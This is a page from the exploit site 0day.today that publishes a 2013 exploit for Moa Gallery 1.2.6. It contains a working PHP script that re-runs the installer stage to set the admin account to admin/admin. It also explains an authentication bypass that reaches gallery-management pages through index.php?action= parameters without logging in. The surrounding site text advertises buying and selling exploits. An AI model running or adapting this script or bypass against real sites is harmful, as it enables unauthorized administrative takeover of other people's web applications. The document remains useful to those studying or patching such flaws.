0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Moa Gallery 1.2.6 Multiple Vulnerabilities
#!/usr/bin/php # Exploit Title : Moa Gallery 1.2.6 Multiple Vulnerabilities # Date : 5/17/2013 # Author: Slotleet # Slotleet () GMAIL com # https://fb.com/Slotleet # Vendor Homepage: http://www.moagallery.net/ # Version affected : 1.2.6 # Tested on: WIN 7 Xd4rk EDITION # Greets : Faris , Sec4ever , Omleet-dz , RAB3OUN , b0x , Damane , Mohamed-bel , The Injector , Ahmad Ramahi , Ziad-dz , And Again Faris :P # # this was written for educational purpose only. use it at your own risk. # `AUTHOR` will be not responsible for any damage caused! user assumes all responsibility # intended for authorized web application pentesting only! #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Moe Gallery 1.2.6 Multiple Vulnerabilities #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ [Add Admin] <? error_reporting(0); if ($argc < 3){ echo "+--------------------------------------+\n"; echo "+ Usage : $argv[0] localhost /moe/ +\n"; echo "+--------------------------------------+\n"; die(); } $site = $argv[1]; $dir = $argv[2]; $ch = curl_init("http://$site/$dir/install.php?stage=stage3a"); curl_setopt ($ch, CURLOPT_POST, true); curl_setopt ($ch, CURLOPT_POSTFIELDS, "Moeuser=admin&Moepass=admin"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); if ($result){ echo "+-------------------------------------===--+\n"; echo "+ Done ~ Username : Admin Password : Admin +\n"; echo "+--------------------------------===-------+\n"; } ?> ~ [Session Bypass] 1 // Redirect admin access for anyone not logged in 2 if ((!UserIsLoggedIn()) && (0 == strcmp(substr($action, 0, 5), 'admin'))) 3 { 4 $action = 'login'; 5 } 6 7 switch($action) 8 { 9 case "admin" : 10 { 11 include_once("sources/page_admin.php"); 12 break; 13 } 14 case "admin_ftp" : 15 { 16 include_once("sources/page_admin_ftp.php"); 17 break; 18 } look to line 2 theres a function called Userisloggedin to check if the admin logged in or not, but there's `ACTION` param that calls sources folder with switch and case :). let's see if there's a UserIsLoggedIn() in those files :). // Only proceed if a user is logged in if (!UserIsLoggedIn()) { Aahhh There is ;), i check those files, and we can bypass it by browsing (index.php?action=list here) page_gallery_add.php page_gallery_view.php page_image_view.php page_image_view_full.php page_main_view.php page_sitemap.php page_slideshow.php page_upgrade.php we can browse it via (index.php?action=gallery_add) without (Page_) :) ./EOF # 0day.today [2024-12-25] #